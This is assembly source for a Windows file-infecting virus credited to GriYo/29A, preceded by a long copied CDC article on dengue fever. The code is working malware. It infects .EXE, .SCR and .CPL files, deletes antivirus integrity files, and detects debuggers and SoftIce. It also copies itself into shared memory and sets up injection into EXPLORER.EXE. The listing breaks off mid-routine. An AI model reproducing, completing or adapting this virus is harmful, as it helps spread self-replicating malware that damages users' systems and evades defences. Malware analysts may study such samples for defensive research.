Win32.Fever.asm


;============================================================================
;
; Dengue Hemorrhagic Fever
;
; BioCoded by GriYo / 29A
; griyo@bi0.net
;
;============================================================================
;
; About the biomodel
; ------------------
;
; Dengue Hemorrhagic Fever: The Emergence of a Global Health Problem
;
; Dengue and dengue hemorrhagic fever (DHF) are caused by one of four
;closely related, but antigenically distinct, virus serotypes (DEN-1, DEN-2,
;DEN-3, and DEN-4), of the genus Flavivirus. Infection with one of these
;serotypes does not provide cross-protective immunity, so persons living in
;a dengue-endemic area can have four dengue infections during their
;lifetimes. Dengue is primarily an urban disease of the tropics, and the
;viruses that cause it are maintained in a cycle that involves humans and
;Aedes aegypti, a domestic, day-biting mosquito that prefers to feed on
;humans. Infection with a dengue virus serotype can produce a spectrum of
;clinical illness, ranging from a nonspecific viral syndrome to severe and
;fatal hemorrhagic disease. Important risk factors for DHF include the
;strain and serotype of the virus involved, as well as the age, immune
;status, and genetic predisposition of the patient.
;
; The first reported epidemics of dengue fever occurred in 1779-1780
;in Asia, Africa, and North America; the near simultaneous occurrence of
;outbreaks on three continents indicates that these viruses and their
;mosquito vector have had a worldwide distribution in the tropics for more
;than 200 years. During most of this time, dengue fever was considered a
;benign, nonfatal disease of visitors to the tropics. Generally, there were
;long intervals (10-40 years) between major epidemics, mainly because the
;viruses and their mosquito vector could only be transported between
;population centers by sailing vessels.
;
; A global pandemic of dengue begun in Southeast Asia after World
;War II and has intensified during the last 15 years. Epidemics caused by
;multiple serotypes (hyperendemicity) are more frequent, the geographic
;distribution of dengue viruses has expanded, and DHF has emerged in the
;Pacific region and the Americas. In Southeast Asia, epidemic DHF
;first appeared in the 1950s, but by 1975 it had become a leading cause of
;hospitalization and death among children in many countries. In the 1980s,
;DHF began a second expansion into Asia when Sri Lanka, India, and the
;Maldive Islands had their first major DHF epidemics; Pakistan first
;reported an epidemic of dengue fever in 1994. The recent epidemics in
;Sri Lanka and India were associated with multiple dengue virus serotypes,
;but DEN-3 was predominant and was genetically distinct from DEN-3 viruses
;previously isolated from infected persons in those countries.
;
; After an absence of 35 years, epidemic dengue fever occurred in
;both Taiwan and the People's Republic of China in the 1980s. The People's
;Republic of China had a series of epidemics caused by all four serotypes,
;and its first major epidemic of DHF, caused by DEN-2, was reported on
;Hainan Island in 1985. Singapore also had a resurgence of dengue/DHF
;from 1990 to 1994 after a successful control program had prevented
;significant transmission for over 20 years. In other countries of Asia
;where DHF is endemic, the epidemics have become progressively larger in the
;last 15 years.
;
; In the Pacific, dengue viruses were reintroduced in the early 1970s
;after an absence of more than 25 years. Epidemic activity caused by all
;four serotypes has intensified in recent years with major epidemics of DHF
;on several islands.
;
; Despite poor surveillance for dengue in Africa, we know that
;epidemic dengue fever caused by all four serotypes has increased
;dramatically since 1980. Most activity has occurred in East Africa, and
;major epidemics were reported for the first time in the Seychelles (1977),
;Kenya (1982, DEN-2), Mozambique (1985, DEN-3), Djibouti (1991-92, DEN-2),
;Somalia (1982, 1993, DEN-2), and Saudi Arabia (1994, DEN-2) (CDC,
;unpublished data). Epidemic DHF has been reported in neither Africa nor the
;Middle East, but sporadic cases clinically compatible with DHF have been
;reported from Mozambique, Djibouti, and Saudi Arabia (CDC, unpublished
;data).
;
; The emergence of dengue/DHF as a major public health problem has
;been most dramatic in the American region. In an effort to prevent urban
;yellow fever, which is also transmitted by Ae. aegypti, the Pan American
;Health Organization organized a campaign that eradicated Ae. aegypti from
;most Central and South American countries in the 1950s and 1960s. As a
;result, epidemic dengue occurred only sporadically in some Caribbean
;islands during this period. The Ae. aegypti eradication program, which was
;officially discontinued in the United States in 1970, gradually eroded
;elsewhere, and this species began to reinfest countries from which it had
;been eradicated. In 1995, the geographic distribution of Ae. aegypti was
;similar to its distribution before the eradication program.
;
; In 1970, only DEN-2 virus was present in the Americas, although
;DEN-3 may have had a focal distribution in Colombia and Puerto Rico. In
;1977, DEN-1 was introduced and caused major epidemics throughout the
;region over a 16-year period. DEN-4 was introduced in 1981 and caused
;similar widespread epidemics. Also in 1981, a new strain of DEN-2 from
;Southeast Asia caused the first major DHF epidemic in the Americas (Cuba).
;This strain has spread rapidly throughout the region and has caused
;outbreaks of DHF in Venezuela, Colombia, Brazil, French Guiana, Suriname,
;and Puerto Rico. By 1995, 14 countries in the American region had reported
;confirmed DHF cases, and DHF is endemic in many of these countries.
;
; DEN-3 virus recently reappeared in the Americas after an absence of
;16 years. This serotype was first detected in association with a 1994
;dengue/DHF epidemic in Nicaragua. Almost simultaneously, DEN-3 was
;confirmed in Panama and, in early 1995, in Costa Rica (CDC, unpublished
;data). In Nicaragua, considerable numbers of DHF were associated with the
;epidemic, which was apparently caused by DEN-3. In Panama and Costa Rica,
;the cases were classic dengue fever.
;
; Viral envelope gene sequence data from the DEN-3 strains isolated
;from Panama and Nicaragua have shown that this new American DEN-3 virus
;strain was likely a recent introduction from Asia since it is genetically
;distinct from the DEN-3 strain found previously in the Americas, but is
;identical to the DEN-3 virus serotype that caused major DHF epidemics in
;Sri Lanka and India in the 1980s (R. Lanciotti; unpublished data). The new
;DEN-3 strain, and the susceptibility of the population in the American
;tropics to it, suggests that DEN-3 will spread rapidly throughout the
;region and likely will cause major epidemics of dengue/DHF in the near
;future.
;
; In 1995, dengue is the most important mosquito-borne viral disease
;affecting humans; its global distribution is comparable to that of malaria,
;and an estimated 2.5 billion people are living in areas at risk for epidemic
;transmission. Each year, tens of millions of cases of dengue fever occur
;and, depending on the year, up to hundreds of thousands of cases of DHF. The
;case-fatality rate of DHF in most countries is about 5%: most fatal cases
;are among children.
;
; There is a small, but significant, risk for dengue outbreaks in the
;continental United States. Two competent mosquito vectors, Ae. aegypti and
;Aedes albopictus, are present and, under certain circumstances, each could
;transmit dengue viruses. This type of transmission has been detected twice
;in the last 15 years in south Texas (1980 and 1986) and has been associated
;with dengue epidemics in northern Mexico. Moreover, numerous viruses are
;introduced annually by travelers returning from tropical areas where dengue
;viruses are endemic. From 1977 to 1994, a total of 2,248 suspected cases of
;imported dengue were reported in the United States (CDC, unpublished data).
;Although some specimens collected were not adequate for laboratory
;diagnosis, preliminary data indicate that 481 (21%) cases were confirmed as
;dengue (CDC, unpublished data). Many more cases probably go unreported each
;year because surveillance in the United States is passive and relies on
;physicians to recognize the disease, inquire about the patient's travel
;history, obtain proper diagnostic samples, and report the case. These data
;underscore the fact that southern Texas and the southeastern United States,
;where Ae. aegypti is found, are at risk for dengue transmission and
;sporadic outbreaks.
;
; The reasons for this dramatic global emergence of dengue/DHF as a
;major public health problem are complex and not well understood. However,
;several important factors can be identified. First, effective mosquito
;control is virtually nonexistent in most dengue-endemic countries.
;Considerable emphasis for the past 20 years has been placed on
;ultra-low-volume insecticide space sprays for adult mosquito control, a
;relatively ineffective approach for controlling Ae. aegypti. Second, major
;global demographic changes have occurred, the most important of which have
;been uncontrolled urbanization and concurrent population growth. These
;demographic changes have resulted in substandard housing and inadequate
;water, sewer, and waste management systems, all of which increase
;Ae. aegypti population densities and facilitate transmission of
;Ae. aegypti-borne disease. Third, increased travel by airplane provides
;the ideal mechanism for transporting dengue viruses between population
;centers of the tropics, resulting in a constant exchange of dengue viruses
;and other pathogens. Lastly, in most countries the public health
;infrastructure has deteriorated. Limited financial and human resources and
;competing priorities have resulted in a "crisis mentality" with emphasis
;on implementing so-called emergency control methods in response to
;epidemics rather than on developing programs to prevent epidemic
;transmission. This approach has been particularly detrimental to dengue
;control because, in most countries, surveillance is very inadequate; the
;system to detect increased transmission normally relies on reports by local
;physicians who often do not consider dengue in their diagnoses. As a result,
;an epidemic has often reached or passed the peak of transmission before it
;is detected.
;
; No dengue vaccine is available. Recently, however, attenuated
;candidate vaccine viruses have been developed in Thailand. These vaccines
;are safe and immunogenic when given in various formulations, including a
;quadrivalent vaccine for all four dengue virus serotypes. Unfortunately,
;efficacy trials in human volunteers have yet to be initiated. Research is
;also being conducted to develop second-generation recombinant vaccine
;viruses; the Thailand attenuated viruses are used as a template. However,
;an effective dengue vaccine for public use will not be available for 5 to
;10 years.
;
; Prospects for reversing the recent trend of increased epidemic
;activity and geographic expansion of dengue are not promising. New dengue
;virus strains and serotypes will likely continue to be introduced into many
;areas where the population densities of Ae. aegypti are at high levels. With
;no new mosquito control technology available, in recent years public health
;authorities have emphasized disease prevention and mosquito control through
;community efforts to reduce larval breeding sources. Although this approach
;will probably be effective in the long run, it is unlikely to impact disease
;transmission in the near future. We must, therefore, develop improved,
;proactive, laboratory-based surveillance systems that can provide early
;warning of an impending dengue epidemic. At the very least, surveillance
;results can alert the public to take action and physicians to diagnose and
;properly treat dengue/DHF cases.
;
;Duane J. Gubler and Gary G. Clark
;National Center for Infectious Diseases
;Centers for Disease Control and Prevention
;Fort Collins, Colorado, and San Juan, Puerto Rico, USA
;
;============================================================================

.386P
locals
jumps
.model flat,STDCALL

include Win32api.inc
include Useful.inc
include Mz.inc
include Pe.inc

extrn GetModuleHandleA:NEAR
extrn Sleep:NEAR

NUMBER_OF_POLY_LAYERS equ 04h ; Max number of poly decryptors

;============================================================================
;Fake host used for virus 1st generation
;============================================================================

_TEXT segment dword use32 public 'CODE'

;============================================================
;We need the CRC lookup table for the next steps
;============================================================

host_code: xor ebp,ebp
call make_crc_tbl

;============================================================
;Save the CRC32 of 'KERNEL32.DLL' inside virus body
;============================================================

mov esi,offset g1_szKernel32
call get_str_crc32
mov dword ptr [CrcKernel32],edx

;============================================================
;Save the CRC32 of 'GetProcAddress' inside virus body
;============================================================

mov esi,offset g1_szGetProcAddr
call get_str_crc32
mov dword ptr [CrcGetProcAddr],edx

;============================================================
;Save the CRC32 of infectable file extensions
;============================================================

mov esi,offset g1_szEXE
call get_str_crc32
mov dword ptr [CRC32_szEXE],edx

mov esi,offset g1_szSCR
call get_str_crc32
mov dword ptr [CRC32_szSCR],edx

mov esi,offset g1_szCPL
call get_str_crc32
mov dword ptr [CRC32_szCPL],edx

;============================================================
;Save the CRC32 of some AV files
;============================================================

mov ecx,NumberOfAV
mov esi,offset g1_av_names
mov edi,offset TblCRC32AV
call save_crc_names

;============================================================
;Save the CRC32 of EXPLORER.EXE
;============================================================

mov esi,offset g1_szEXPLORER
call get_str_crc32
mov dword ptr [CRCszEXPLORER],edx

;============================================================
;Save the CRC32 of 'USER32.DLL'
;============================================================

mov esi,offset g1_szUSER32
call get_str_crc32
mov dword ptr [CRCszUSER32],edx

;============================================================
;Save the CRC32 of 'PSAPI.DLL'
;============================================================

mov esi,offset g1_szPSAPI
call get_str_crc32
mov dword ptr [CRCszPSAPI],edx

;============================================================
;Save the CRC32 of 'IMAGEHLP.DLL'
;============================================================

mov esi,offset g1_szIMGHLP
call get_str_crc32
mov dword ptr [CRCszIMGHLP],edx

;============================================================
;Save the CRC32 of 'SFC.DLL'
;============================================================

mov esi,offset g1_szSFC
call get_str_crc32
mov dword ptr [CRCszSFC],edx

;============================================================
;Get CRC's of needed API's and save them inside virus body
;Lets start with KERNEL32 API names
;============================================================

mov ecx,NumK32Apis
mov esi,offset namesK32Apis
mov edi,offset CRC32K32Apis
call save_crc_names

;============================================================
;This are some special handled APIs
;============================================================

mov ecx,00000001h
mov esi,offset name_IsDebuggerPresent
mov edi,offset CRC32_IsDebugPr
call save_crc_names

;============================================================
;Get TOOLHELP APIs (Windows 9x only)
;============================================================

mov ecx,NumTOOLHELPApis
mov esi,offset namesTOOLHELPApis
mov edi,offset CRC32TOOLHELPApis
call save_crc_names

;============================================================
;Get PSAPI.DLL APIs (Windows Nt & Windows 2000 only)
;============================================================

mov ecx,NumPSAPIApis
mov esi,offset namesPSAPIApis
mov edi,offset CRC32PSAPIApis
call save_crc_names

;============================================================
;Get API used to compute image checksum
;============================================================

mov ecx,NumIMGHLPApis
mov esi,offset namesIMGHLPApis
mov edi,offset CRC32IMGHLPApis
call save_crc_names

;============================================================
;Get API used to check for Windows2000 System File Protection
;============================================================

mov ecx,NumSFCApis
mov esi,offset namesSFCApis
mov edi,offset CRC32SFCApis
call save_crc_names

;============================================================
;Get CRC32 of USER32 API names ( Ansi version )
;============================================================

mov ecx,NumUSER32Apis
mov esi,offset namesUSER32Apisw9x
mov edi,offset CRC32USER32Apisw9x
call save_crc_names

;============================================================
;Get CRC32 of USER32 API names ( Wide version )
;============================================================

mov ecx,NumUSER32Apis
mov esi,offset namesUSER32Apiswnt
mov edi,offset CRC32USER32Apiswnt
call save_crc_names

;============================================================
;Build the do-not-infect-file-by-name CRC32 table
;============================================================

mov ecx,avoid_num
mov esi,offset g1_avoid_files
mov edi,offset avoid_tbl
call save_crc_names

;============================================================
;Get KERNEL32.DLL module handle
;============================================================

push offset g1_szKernel32
call GetModuleHandleA
or eax,eax
jz out_1st_gen
mov ebx,eax
xor ebp,ebp

db 05h dup (90h)

call get1st_end

db 05h dup (90h)

;============================================================
;Let the 1st generation host running
;============================================================

out_1st_gen: push 0FFFFFFFFh
call Sleep

jmp out_1st_gen ;Never executed, but i dont want to remove it
;anyway, this wont take part of the main
;virus body...

;============================================================
;Ready to jump into main virus body !!!!
;============================================================

get1st_end: push eax ; Space for ebx
push eax ; Space for esi
push eax ; Space for edi
push eax ; Space for ebp

xor ebp,ebp
jmp entry_1st_gen

;============================================================
;Routine that converts API names in CRC32 values
;============================================================

save_crc_names: cld
get_g1_crc: push ecx
lodsd
push esi
mov esi,eax
call get_str_crc32
mov eax,edx
stosd
pop esi
pop ecx
loop get_g1_crc
ret

_TEXT ends

;============================================================================
;Here comes the rest of the sections in virus 1st generation
;============================================================================

_DATA segment dword use32 public 'DATA'

;============================================================
;Used to locate KERNEL32 base address on 1st generation
;============================================================

g1_szKernel32 db 'KERNEL32.DLL',00h
g1_szGetProcAddr db 'GetProcAddress',00h

;============================================================
;Used to check if file extension is infectable
;============================================================

g1_szEXE db '.EXE',00h
g1_szSCR db '.SCR',00h
g1_szCPL db '.CPL',00h

;============================================================
;This virus use CRC32 instead of DLL names !!!!
;
;LoadLibrary requires the DLL name as parameter... but
;we can find the DLL name by browsing SYSTEM32 directory
;for a file whose CRC32 matches a given one
;============================================================

g1_szEXPLORER db 'EXPLORER.EXE',00h
g1_szUSER32 db 'USER32.DLL',00h
g1_szPSAPI db 'PSAPI.DLL',00h
g1_szIMGHLP db 'IMAGEHLP.DLL',00h
g1_szSFC db 'SFC.DLL',00h

;============================================================
;Do not infect files with this character combinations on
;their names
;============================================================

g1_avoid_files equ $

dd offset g1_avoid_00
dd offset g1_avoid_01
dd offset g1_avoid_02
dd offset g1_avoid_03
dd offset g1_avoid_04
dd offset g1_avoid_05
dd offset g1_avoid_06
dd offset g1_avoid_07
dd offset g1_avoid_08
dd offset g1_avoid_09
dd offset g1_avoid_0A
dd offset g1_avoid_0B
dd offset g1_avoid_0C
dd offset g1_avoid_0D
dd offset g1_avoid_0E
dd offset g1_avoid_0F
dd offset g1_avoid_10
dd offset g1_avoid_11
dd offset g1_avoid_12
dd offset g1_avoid_13
dd offset g1_avoid_14
dd offset g1_avoid_15
dd offset g1_avoid_16
dd offset g1_avoid_17
dd offset g1_avoid_18

avoid_num equ ($-g1_avoid_files)/04h

g1_avoid_00 db 'DR',00h
g1_avoid_01 db 'PA',00h
g1_avoid_02 db 'RO',00h
g1_avoid_03 db 'VI',00h
g1_avoid_04 db 'AV',00h
g1_avoid_05 db 'TO',00h
g1_avoid_06 db 'CA',00h
g1_avoid_07 db 'IN',00h
g1_avoid_08 db 'MS',00h
g1_avoid_09 db 'SR',00h
g1_avoid_0A db 'SP',00h
g1_avoid_0B db 'RP',00h
g1_avoid_0C db 'PR',00h
g1_avoid_0D db 'NO',00h
g1_avoid_0E db 'CE',00h
g1_avoid_0F db 'LE',00h
g1_avoid_10 db 'MO',00h
g1_avoid_11 db 'SM',00h
g1_avoid_12 db 'DD',00h
g1_avoid_13 db 'SO',00h
g1_avoid_14 db 'SQ',00h
g1_avoid_15 db 'EX',00h
g1_avoid_16 db 'IE',00h
g1_avoid_17 db 'CM',00h
g1_avoid_18 db 'CO',00h

;============================================================
;Delete this AV files
;============================================================

g1_av_names equ $

dd offset g1_delete_00
dd offset g1_delete_01
dd offset g1_delete_02
dd offset g1_delete_03
dd offset g1_delete_04

NumberOfAV equ ($-g1_av_names)/04h

g1_delete_00 db 'AVP.CRC',00h
g1_delete_01 db 'ANTI-VIR.DAT',00h
g1_delete_02 db 'CHKLIST.CPS',00h
g1_delete_03 db 'CHKLIST.MS',00h
g1_delete_04 db 'IVP.NTZ',00h

;============================================================
;KERNEL32.DLL API names
;
;Note that this tables and strings are not included into the
;virus body after 1st generation. Only CRC32 values
;============================================================

namesK32Apis equ $

dd offset g1_CreateFileA
dd offset g1_CreateFileMappingA
dd offset g1_CreateProcessA
dd offset g1_CreateThread
dd offset g1_CloseHandle
dd offset g1_DeleteFileA
dd offset g1_ExitThread
dd offset g1_FindClose
dd offset g1_FindFirstFileA
dd offset g1_FindNextFileA
dd offset g1_FreeLibrary
dd offset g1_GetComputerNameA
dd offset g1_GetCurrentProcess
dd offset g1_GetDriveTypeA
dd offset g1_GetFileAttributesA
dd offset g1_GetLastError
dd offset g1_GetLocalTime
dd offset g1_GetLogicalDriveStringsA
dd offset g1_GetSystemDirectoryA
dd offset g1_GetVersionEx
dd offset g1_LoadLibraryA
dd offset g1_MapViewOfFile
dd offset g1_OpenFileMappingA
dd offset g1_OpenProcess
dd offset g1_ReadProcessMemory
dd offset g1_SetEndOfFile
dd offset g1_SetFileAttributesA
dd offset g1_SetFilePointer
dd offset g1_SetFileTime
dd offset g1_Sleep
dd offset g1_UnmapViewOfFile
dd offset g1_WriteProcessMemory

g1_CreateFileA db 'CreateFileA',00h
g1_CreateFileMappingA db 'CreateFileMappingA',00h
g1_CreateProcessA db 'CreateProcessA',00h
g1_CreateThread db 'CreateThread',00h
g1_CloseHandle db 'CloseHandle',00h
g1_DeleteFileA db 'DeleteFileA',00h
g1_ExitThread db 'ExitThread',00h
g1_FindClose db 'FindClose',00h
g1_FindFirstFileA db 'FindFirstFileA',00h
g1_FindNextFileA db 'FindNextFileA',00h
g1_FreeLibrary db 'FreeLibrary',00h
g1_GetComputerNameA db 'GetComputerNameA',00h
g1_GetCurrentProcess db 'GetCurrentProcess',00h
g1_GetDriveTypeA db 'GetDriveTypeA',00h
g1_GetFileAttributesA db 'GetFileAttributesA',00h
g1_GetLastError db 'GetLastError',00h
g1_GetLocalTime db 'GetLocalTime',00h
g1_GetLogicalDriveStringsA db 'GetLogicalDriveStringsA',00h
g1_GetSystemDirectoryA db 'GetSystemDirectoryA',00h
g1_LoadLibraryA db 'LoadLibraryA',00h
g1_GetVersionEx db 'GetVersionExA',00h
g1_MapViewOfFile db 'MapViewOfFile',00h
g1_OpenFileMappingA db 'OpenFileMappingA',00h
g1_OpenProcess db 'OpenProcess',00h
g1_ReadProcessMemory db 'ReadProcessMemory',00h
g1_SetEndOfFile db 'SetEndOfFile',00h
g1_SetFileAttributesA db 'SetFileAttributesA',00h
g1_SetFilePointer db 'SetFilePointer',00h
g1_SetFileTime db 'SetFileTime',00h
g1_Sleep db 'Sleep',00h
g1_UnmapViewOfFile db 'UnmapViewOfFile',00h
g1_WriteProcessMemory db 'WriteProcessMemory',00h

;============================================================
;Special KERNEL32 APIs
;============================================================

name_IsDebuggerPresent dd offset g1_IsDebuggerPresent

g1_IsDebuggerPresent db 'IsDebuggerPresent',00h

;============================================================
;ToolHelp APIs
;============================================================

namesTOOLHELPApis equ $

dd offset g1_CreateToolhelp32Snapshot
dd offset g1_Process32First
dd offset g1_Process32Next
dd offset g1_Module32First
dd offset g1_Module32Next

g1_CreateToolhelp32Snapshot db 'CreateToolhelp32Snapshot',00h
g1_Process32First db 'Process32First',00h
g1_Process32Next db 'Process32Next',00h
g1_Module32First db 'Module32First',00h
g1_Module32Next db 'Module32Next',00h

;============================================================
;PSAPI.DLL API names
;============================================================

namesPSAPIApis equ $

dd offset g1_EnumProcessModules
dd offset g1_EnumProcesses
dd offset g1_GetModuleBaseNameA
dd offset g1_GetModuleInformation

g1_EnumProcessModules db 'EnumProcessModules',00h
g1_EnumProcesses db 'EnumProcesses',00h
g1_GetModuleBaseNameA db 'GetModuleBaseNameA',00h
g1_GetModuleInformation db 'GetModuleInformation',00h

;============================================================
;SFC.DLL API names
;============================================================

namesSFCApis equ $

dd offset g1_SfcIsFileProtected

g1_SfcIsFileProtected db 'SfcIsFileProtected',00h

;============================================================
;IMAGEHLP.DLL API names
;============================================================

namesIMGHLPApis equ $

dd offset g1_CheckSumMappedFile

g1_CheckSumMappedFile db 'CheckSumMappedFile',00h

;============================================================
;USER32.DLL API names (Ansi version)
;============================================================

namesUSER32Apisw9x equ $

dd offset g1w9x_DefWindowProc

g1w9x_DefWindowProc db 'DefWindowProcA',00h

;============================================================
;USER32.DLL API names (Wide version)
;============================================================

namesUSER32Apiswnt equ $

dd offset g1wnt_DefWindowProc

g1wnt_DefWindowProc db 'DefWindowProcW',00h

_DATA ends

_BSS segment dword use32 public 'BSS'

_BSS ends

;============================================================================
;Viral section
;
;You have to understand that all the above-mentioned is not part of the virus
;This means that the text strings and other information previous to this
;point will be discarded
;============================================================================

virseg segment dword use32 public 'Dengue'

;============================================================
;Get delta offset in ebp
;============================================================

viro_sys: call HostDelta
HostDelta: pop ebp
sub ebp,offset HostDelta

;============================================================
;Create CRC32 lookup table... This virus uses CRC32 in lots
;of places along its code... Precalculated tables helps to
;really speed-up virus activitie
;============================================================

call make_crc_tbl

;============================================================
;Check CRC32 of main virus body
;
; esi -> Ptr to buffer
; ecx -> Buffer size
;============================================================

mov ecx,SizeOfProtect
lea esi,dword ptr [ebp+CRC_protected]
call get_crc32

;============================================================
;Checksum matches?
;============================================================

db 0B8h ; mov eax,imm
ViralChecksum dd 00000000h

cmp eax,edx
jne critical_error

CRC_protected equ $

;============================================================
;Scan system memory looking for KERNEL32.DLL
;============================================================

KernelScanning: pushad
fK32_try_01: mov eax,080000101h
call IGetNtBaseAddr
jecxz fK32_try_02
jmp short kernel_found
fK32_try_02: mov eax,0C0000101h
call IGetNtBaseAddr
jecxz fK32_try_03
jmp short kernel_found
fK32_try_03: xor eax,eax
call IGetNtBaseAddr
kernel_found: jecxz critical_error
mov dword ptr [esp.Pushad_ebx],ecx
popad

;============================================================
;This is the entry-point for 1st generation
;Now EBX points to KERNEL32.DLL base address
;============================================================

entry_1st_gen: mov dword ptr [ebp+hKERNEL32],ebx

;============================================================
;Search for GetProcAddress entry-point
;============================================================

call GetGetProcAddr
jecxz critical_error
mov dword ptr [ebp+a_GetProcAddress],ecx

;============================================================
;Get KERNEL32 API addresses
;============================================================

mov ecx,NumK32Apis
lea esi,dword ptr [ebp+CRC32K32Apis]
lea edi,dword ptr [ebp+epK32Apis]
call get_APIs
jecxz RestoreHost

;============================================================
;Everything have to work, but if something goes wrong this
;will halt the process
;============================================================

critical_error: jmp critical_error

;============================================================
;Restore host code
;
;Make the return address point to the instruction which
;made the call
;============================================================

API_PUSH_SIZE equ 00000004h*00000004h

RestoreHost: lea esi,dword ptr [esp+API_PUSH_SIZE]
sub dword ptr [esi],00000005h
cld
lodsd

lea esi,dword ptr [ebp+EP_Bytes]
push esi
push 00000005h
call get_org_code

org_code db 05h dup (90h)

get_org_code: push eax
call dword ptr [ebp+a_GetCurrentProcess]
push eax
call dword ptr [ebp+a_WriteProcessMemory]
or eax,eax
jz critical_error

cld
lodsd
cmp eax,00000005h
jne critical_error

;============================================================
;Try to locate IsDebuggerPresent API
;============================================================

mov ecx,00000001h
lea esi,dword ptr [ebp+CRC32_IsDebugPr]
lea edi,dword ptr [ebp+a_IsDebuggerPresent]
call get_APIs
jecxz DetectDebug

jmp short SI_LookUp

;============================================================
;Check if the current process is running in the context of a
;debugger
;============================================================

DetectDebug: call dword ptr [ebp+a_IsDebuggerPresent]
or eax,eax
jnz GoBack2Host

;============================================================
;SoftIce lookup
;
;Code based on the article "Win32 Anti-Debugging tricks" by
;Billy Belcebu/iKX ( published on XINE#4 )
;============================================================

SI_LookUp: mov esi,dword ptr [ebp+a_CreateFileA]

push ecx
push FILE_ATTRIBUTE_READONLY
push OPEN_EXISTING
push ecx
push FILE_SHARE_READ
push GENERIC_READ
call Get_szSIw9x

db '//./SICE',00h

Get_szSIw9x: call esi
cmp eax,INVALID_HANDLE_VALUE
jne SI_Found

push 00000000h
push FILE_ATTRIBUTE_READONLY
push OPEN_EXISTING
push 00000000h
push FILE_SHARE_READ
push GENERIC_READ
call Get_szSIwNT

db '//./NTICE',00h

Get_szSIwNT: call esi
cmp eax,INVALID_HANDLE_VALUE
je SI_NotFound

SI_Found: push eax
call dword ptr [ebp+a_CloseHandle]
jmp GoBack2Host

;============================================================
;Get a object name based on current hostname
;============================================================

SI_NotFound: lea edi,dword ptr [ebp+SizeOfComputerName]
push edi
mov eax,00000020h
cld
stosd
push edi
call dword ptr [ebp+a_GetComputerNameA]
or eax,eax
jz GoBack2Host

mov esi,edi
call get_str_crc32

movzx ecx,byte ptr [edi]
and ecx,00000003h ; Number of characters
inc ecx

lea edi,dword ptr [ebp+szObjectName]

LoopBuildNick: mov al,dl
and al,0Fh
add al,'a' ; Get character
stosb
shr edx,04h
loop LoopBuildNick

mov eax,00003233h
stosd
mov al,cl
stosb

;============================================================
;Allocate shared memory
;
;MSDN says:
;
;"A shared file-mapping object will not be destroyed until
;all processes that use it close their handles to it by using
;the CloseHandle function."
;
;So the idea is to use CreateFileMapping and MapViewOfFile,
;instead of VirtualAlloc... Then read open this
;file-mapping from a small piece of code injected into
;EXPLORER.EXE
;============================================================

lea eax,dword ptr [ebp+szObjectName]
push eax
push alloc_size
push 00000000h
push PAGE_READWRITE
push 00000000h
push 0FFFFFFFFh
call dword ptr [ebp+a_CreateFileMappingA]
or eax,eax
jz GoBack2Host

mov edi,eax

call dword ptr [ebp+a_GetLastError]
cmp eax,000000B7h ; ERROR_ALREADY_EXISTS
jne ResCheckOk

push edi
call dword ptr [ebp+a_CloseHandle]

jmp GoBack2Host

ResCheckOk: push 00000000h
push 00000000h
push 00000000h
push FILE_MAP_WRITE
push edi
call dword ptr [ebp+a_MapViewOfFile]
or eax,eax
jz GoBack2Host

;============================================================
;Copy virus to allocated memory block
;============================================================

lea esi,dword ptr [ebp+viro_sys]
mov edi,eax
mov ecx,size_virtual
cld
rep movsb

;============================================================
;Continue execution on allocated memory!!!!!!!!!
;
;This means we are able to use extended buffers...
;============================================================

add eax,offset HostVirMem - offset viro_sys
push eax
ret

;============================================================================
;Code executed into allocated memory... Extended buffers are available now
;============================================================================

HostVirMem: call MemDelta
MemDelta: pop ebp
sub ebp,offset MemDelta

;============================================================
;The virus needs to locate SYSTEM directory in order to load
;DLL's by using CRC32 instead of their names
;============================================================

push MAX_PATH
lea edi,dword ptr [ebp+szSYSTEMDIR]
push edi
call dword ptr [ebp+a_GetSystemDirectoryA]
or eax,eax
jz GoBack2Host

;edi -> Points 1byte above the null terminator

add edi,eax
cld
mov eax,'D.*/' ; Add '*.DLL'
stosd
mov eax,00004C4Ch
stosd

;============================================================
;Get OS version
;============================================================

lea esi,dword ptr [ebp+system_version]
push esi
mov dword ptr [esi],00000094h
call dword ptr [ebp+a_GetVersionEx]
or eax,eax
jz FreeUSER32

add esi,00000010h
cld
lodsd

cmp eax,VER_PLATFORM_WIN32_NT
je MemInfectWinNt

cmp eax,VER_PLATFORM_WIN32_WINDOWS
je MemInfectWin9x

;============================================================
;Free USER32
;============================================================

FreeUSER32: push dword ptr [ebp+hUSER32]
call dword ptr [ebp+a_FreeLibrary]

;============================================================
;Back to host
;============================================================

TblDoPolyPops equ $

GoBack2Host: pop eax
pop eax
pop eax
pop eax

ret

;============================================================================
;Residency routines for Windows 9x
;============================================================================

;============================================================
;Get hands on USER32.DLL
;============================================================

MemInfectWin9x: mov eax,dword ptr [ebp+CRCszUSER32]
mov ecx,NumUSER32Apis
lea esi,dword ptr [ebp+CRC32USER32Apisw9x]
lea edi,dword ptr [ebp+epUSER32Apis]
call VirLoadLib
mov dword ptr [ebp+hUSER32],eax
or eax,eax
jz GoBack2Host

;============================================================
;The functions provided by the tool help library make it
;easier for you to obtain information about currently
;executing applications. These functions are designed to
;streamline the creation of Win32-hosted tools, specifically
;debuggers
;============================================================

mov ebx,dword ptr [ebp+hKERNEL32]

mov ecx,NumTOOLHELPApis
lea esi,dword ptr [ebp+CRC32TOOLHELPApis]
lea edi,dword ptr [ebp+epTOOLHELPApis]
call get_APIs
jecxz DoneTOOLHELP

ExitMemWin9x: jmp FreeUSER32

;============================================================
;Take a snapshot of the processeses currently loaded in the
;system
;
;The snapshot taken by CreateToolHelpSnapShot function is
;examined by the other tool help functions to provide their
;results
;
;Access to the snapshot is read only. The snapshot handle
;acts like an object handle and is subject to the same rules
;regarding which processes and threads it is valid in
;============================================================

TH32CS_SNAPHEAPLIST equ 00000001h
TH32CS_SNAPPROCESS equ 00000002h
TH32CS_SNAPTHREAD equ 00000004h
TH32CS_SNAPMODULE equ 00000008h
TH32CS_INHERIT equ 80000000h

TH32CS_SNAPALL equ TH32CS_SNAPHEAPLIST or /
TH32CS_SNAPPROCESS or /
TH32CS_SNAPTHREAD or /
TH32CS_SNAPMODULE

DoneTOOLHELP: push ecx ;th32ProcessID
push TH32CS_SNAPPROCESS ;dwFlags

call dword ptr [ebp+a_CreateToolhelp32Snapshot]
cmp eax,0FFFFFFFFh
je ExitMemWin9x

mov dword ptr [ebp+hSnapshot],eax

;============================================================
;Retrieve information about the first process encountered
;in the system snapshot
;============================================================

lea edi,dword ptr [ebp+ProcessEntry]
push edi
mov dword ptr [edi],SIZEOFPROCESSENTRY
push eax
call dword ptr [ebp+a_Process32First]
or eax,eax
jz CloseSnapshot

CheckProcEntry: lea esi,dword ptr [ebp+ProcEszExeFile]
